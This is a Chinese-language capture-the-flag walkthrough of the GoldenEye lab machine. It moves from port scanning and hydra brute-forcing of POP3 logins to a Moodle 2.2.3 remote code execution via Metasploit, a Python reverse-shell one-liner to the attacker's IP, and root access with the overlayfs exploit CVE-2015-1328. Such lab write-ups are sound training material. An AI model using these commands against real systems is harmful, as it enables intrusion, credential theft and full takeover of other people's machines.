goldeneye
非常有记念意义,这是我打的第一个靶机。
先用ifconfig来看看ip
我们是192.168.161段的,我们可以用nmap来扫一下,这个段里面的存活情况
nmap -sP 192.168.161.0/24
段最后是1和2一般是网关,而254是环路,142是我kali自己的,而144应该就是我们的靶机。好了这样我们就得到靶机的ip了
扫一下这个ip
发现有25端口开着smtp服务,还有80端口开着http服务。
打开火狐浏览器将ip放入进去
会得到这个界面,这里的Naviagate to /sev-home/ to login,应该是可以去/sev-home/这个地方来登陆。
进入/sev-home/这个地方看一看。
可以看到真的是可以登陆。看一下源码
里面有一个js文件,我们进入看看
可以看到里面有几行注释的东西,去翻译翻译。
可以看到这些内容。
里面有两个人名,一个是Boris一个是Natalya
我们发现中间的编码其实是html里面的编码,这个我们可以放到burpsuite里面解码
是这个东西InvincibleHack3r,看着像一个密码。
继续回去登陆,试试这两个用户名对不对。
最终用户名是boris密码是InvincibleHack3r
这样我们就登陆成功了。
里面翻译一下
is very effective, we have configured our pop3 service to run on a very high non-default port
谷歌翻译:非常有效,我们已将 pop3 服务配置为在非常高的非默认端口上运行
从上面的消息中,我们可以了解到某个非默认端口上正在运行一个活动的POP3服务,进行nmap全端口扫描:
nmap -p- 192.168.161.144 (-p-:全端口扫描 -p3306:仅仅扫描3306端口)
55006/tcp open unknown
55007/tcp open unknown
发现55006,55007两个开放的端口,扫描端口开启的服务详细信息:
nmap -sS -sV -T5 -A -p55006,55007 192.168.161.144
密码爆破
可以看到两个都是基于mail的服务。所以这时候我们可以用hydra来进行爆破密码,账号应该是
natalya和boris
echo -e 'natalya\nboris' > dayu.txt ---将两个用户名写入txt文本中hydra -L dayu.txt -P /usr/share/wordlists/fasttrack.txt 192.168.161.144 -s 55007 pop3
接着用hydra来爆破就行,这里的/usr/share/wordlists/fasttrack.txt这个是kali自带的,登上5分钟左右就行了。经过2~5分钟等待,获得两组账号密码:
[55007][pop3] host: 192.168.161.144 login: natalya password: bird
[55007][pop3] host: 192.168.161.144 login: boris password: secret1!
用户:boris 密码:secret1!
用户:natalya 密码:bird
接下来通过NC登录pop3查看邮件信封内容枚举:
nc 192.168.161.144 55007 ---登录邮箱
user boris ---登录用户
pass secret1! ---登录密码
list ---查看邮件数量
retr 1~3 ---查看邮件内容
有三封邮件一个一个查看。
第二封来自用户“natalya”,称她可以破坏鲍里斯的密码。
第三封邮件可以看出有一份文件用了GoldenEye的访问代码作为附件进行发送,并保留在根目录中。但我们无法从此处阅读附件。
natalya用户登录邮件查看信息:
nc 192.168.161.144 55007 ---登录邮箱
user natalya ---登录用户
pass bird ---登录密码
list ---查看邮件数量
retr 1~3 ---查看邮件内容
这个也看看有什么
两封邮件:第一封邮件:
娜塔莉亚,请你停止破解鲍里斯的密码。 此外,您是 GNO 培训主管。 一旦学生被指定给你,我就会给你发电子邮件。
此外,请注意可能的网络漏洞。 我们获悉,一个名为 Janus 的犯罪集团正在追捕 GoldenEye。
第二封邮件:
好的 Natalyn 我有一个新学生给你。 由于这是一个新系统,如果您看到任何配置问题,请告诉我或鲍里斯,尤其是它与安全有关的问题……即使不是,也只需以“安全”为幌子输入……它就会 轻松升级变更单:)
好的,用户信用是:
用户名:xenia
密码:RCP90rulez!
鲍里斯验证了她是一个有效的承包商,所以只需创建帐户好吗?
如果您没有外部内部域的 URL:severnaya-station.com/gnocertdir
**请务必编辑您的主机文件,因为您通常在远程离线工作….
由于您是 Linux 用户,因此只需将此服务器 IP 指向 /etc/hosts 中的 severnaya-station.com。
去/etc/hosts里面添加
这时候就可以去那个severnaya-station.com/gnocertdir这个网址了
登陆网址
刚登陆界面我就看到了moodle,这是一个开源的CMS系统,继续点一点,发现要登陆,使用邮件获得的用户密码进行登陆。
点击:Intro to GoldenEye可以进行登录,使用natalya邮箱第二封邮件获得的用户名密码登录:
用户名:xenia
密码:RCP90rulez!
Home / ▶ My profile / ▶ Messages —>发现有一封邮件,内容发现用户名doak
我们继续来爆破Doak的这个用户
[55007][pop3] host: 192.168.161.144 login: doak password: goat
这时候再去
nc 192.168.161.144 55007 ---登录邮箱
user doak ---登录用户
pass goat ---登录密码
list ---查看邮件数量
retr 1 ---查看邮件内容得到邮件消息说,为我们提供了更多登录凭据以登录到应用程序。让我们尝试使用这些凭据登录。
用户名:dr_doak
密码:4England!
去网站登陆这个
登录后在:Home / ▶ My home 右边发现: s3cret.txt
另外发现这是Moodle使用的2.2.3版本
Something juicy is located here: /dir007key/for-007.jpg
现在我们查看文件的内容,指出管理员凭据已隐藏在映像文件中,让我们在浏览器中打开图像以查看其内容。
下载图片
下载到本地:
wget http://severnaya-station.com/dir007key/for-007.jpg
得到了抽象的图片。
exiftool for-007.jpg
strings for-007.jpg
用以上命令都可以查看到base64编码隐藏信息:eFdpbnRlcjE5OTV4IQ==
利用burpsuite解码
得到这个xWinter1995x!
线索中说,这是管理员用户的密码。管理员用户身份继续登陆应用程序。
所以是
用户名:admin
密码:xWinter1995x!
去网站试一试。
登陆成功。
进去内容太多了,花了很多时间查看,图片红框显示和我前面使用dr_doak用户登陆邮箱发现的结果一致。
这是Moodle使用的2.2.3版本,搜索了网上的可用漏洞。
Moodle 2.2.3 exp cve –> CVE-2013-3630 漏洞可利用! 29324
此版本有许多漏洞利用,由于我们需要在目标计算机上进行外壳访问,因此我选择使用远程代码执行(RCE)漏洞利用。
msf利用
使用我们的神器:MSF
msfconsole —进入MSF框架攻击界面
search moodle —查找 moodle类型 攻击的模块
这里用2013年的就行
use 1
我们得需要看看需要填什么内容
所以有show options
需要填写这些内容
set username admin ---设置用户名:admin
set password xWinter1995x! ---设置密码:xWinter1995x!
set rhost severnaya-station.com ---设置:rhosts severnaya-station.com
set targeturi /gnocertdir ---设置目录: /gnocertdir
set payload cmd/unix/reverse ---设置payload:cmd/unix/reverse
set lhost 192.168.161.142 ---设置:lhost 192.168.4.231(需要本地IP)
exploit/run ----执行命令
这里错误了,这里需要我们去改一下
当我们执行后发现无法成功,是因为对方需要修改执行PSpellShell
由于我们已经使用了管理员admin用户登录页面,由于使用的是powershell命令,需要在设置中修改:
Home / ▶ Site administration / ▶ Plugins / ▶ Text editors / ▶ TinyMCE HTML editor
来到此处,修改PSpellShell然后save!
改完之后再去执行。
发现装了python
执行tty,因为获得的权限无框架:执行
python -c ‘import pty; pty.spawn(“/bin/bash”)’ —将shell进行tty
接下来进行python反弹shell
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.161.142",6666));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'在Home / ▶ Site administration / ▶ Server / ▶ System paths ▶ Path to aspell
里面添加上这个python的命令行,别忘记保存。
我们去终端开启一个端口为6666的监听
nc -vlp 6666接下来是触发咱的命令。
到这个地方,点击上面右下角的ABC就可以触发了。
这样不好看,用这条命令
python -c 'import pty; pty.spawn("/bin/bash")'uname -a 查看权限!
Linux ubuntu 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:08 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux
谷歌搜索:Linux ubuntu 3.13.0-32 exploit
获得exp版本:37292
CVE(CAN) ID: CVE-2015-1328
发现这个脚本是必须要有gcc的,而我们这台机子貌似没有。
其实cc也可以,看看有没有cc
有cc,到时候把脚本里面的gcc改成cc就行。
原理:overlayfs文件系统是一种叠合式文件系统,实现了在底层文件系统上叠加另一个文件系统。Linux 内核3.18开始已经加入了对overlayfs的支持。Ubuntu Linux内核在更早的版本就已加入该支持。
Ubuntu Linux内核的overlayfs文件系统实现中存在一个权限检查漏洞,本地普通用户可以获取管理员权限。此漏洞影响所有目前官方支持的Ubuntu Linux版本,目前已经发布攻击代码,建议受影响用户尽快进行升级。
此漏洞源于overlayfs文件系统在上层文件系统目录中创建新文件时没有正确检查文件权限。它只检查了被修改文件的属主是否有权限在上层文件系统目录写入,导致当从底层文件系统目录中拷贝一个文件到上层文件系统目录时,文件属性也随同拷贝过去。如果Linux内核设置了CONFIG_USER_NS=y和FS_USERNS_MOUNT标志,将允许一个普通用户在低权限用户命名空间中mout一个overlayfs文件系统。本地普通用户可以利用该漏洞在敏感系统目录中创建新文件或读取敏感文件内容,从而提升到管理员权限。
kali搜索下:
searchsploit 37292 ---搜索kali本地的exp库中37292攻击脚本信息
cp /usr/share/exploitdb/exploits/linux/local/37292.c '/home/kali/Desktop/baji/goldeneye' ---目录自行修改
打开脚本,把gcc改成cc。
然后在本目录下开启http服务:
python -m http.server 8081接着去我们弹的shell里面输入这个
wget http://192.168.161.142:8081/37292.c ---wget下载http服务下的文件
这里我们下载完成,用cc编译一下。
cc -o exp 37292.c ---C语言的CC代码编译点c文件
chmod +x exp ---编译成可执行文件,并赋权
./exp ---点杠执行
此时我们就获得了root权限。
cd /root --去root文件夹里面
ls -la --看看隐藏文件
有.flag.txt
直接cat
cat .flag.txt
